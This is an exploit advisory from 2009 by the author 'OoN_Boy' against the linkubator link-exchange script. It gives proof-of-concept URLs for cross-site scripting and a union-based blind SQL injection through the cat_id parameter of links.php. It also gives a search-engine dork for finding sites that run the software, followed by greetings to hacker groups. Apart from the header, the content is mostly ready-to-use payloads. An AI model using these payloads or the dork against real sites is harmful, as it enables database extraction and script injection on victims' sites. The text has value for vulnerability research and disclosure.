Linkubator suffers from cross site scripting and blind SQL injection vulnerabilities.
f5237635ac49fbc1016ad07f69c28bbf83dc5357e75803dd1ed98d8784642d72
[+]=================================================================[+]
[x]Title : linkubator (cat_id) Blind Sql & xss Injection Vulnerability
[x]Software : linkubator
[x]Description : Free Link Exchange for Clients & Friends of Green Web Design
[x]Vendor : http://www.linkubator.ws
[x]Version : unknown
[x]Date : 26 April 2009 ( Indonesia )
[x]Author : OoN_Boy
[x]Contact : oon.boy9@gmail.com
[x]Blog : http://oonboy.blogspot.com
[+]=================================================================[+]
[x] Exploit / Poc
http://[site]/[path]/links.php?cat_id=[Xss]
http://[site]/[path]/links.php?cat_id=-1+and+1=2+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--
[+]=================================================================[x]
[x]Dork:
"linkubator" or "Small Business Link Exchange"
[+]=================================================================[x]
[x] Special Greetz
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea,xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny
Dan buat semuanya yg ga bisa di sebut satu²
[+]=================================================================[+]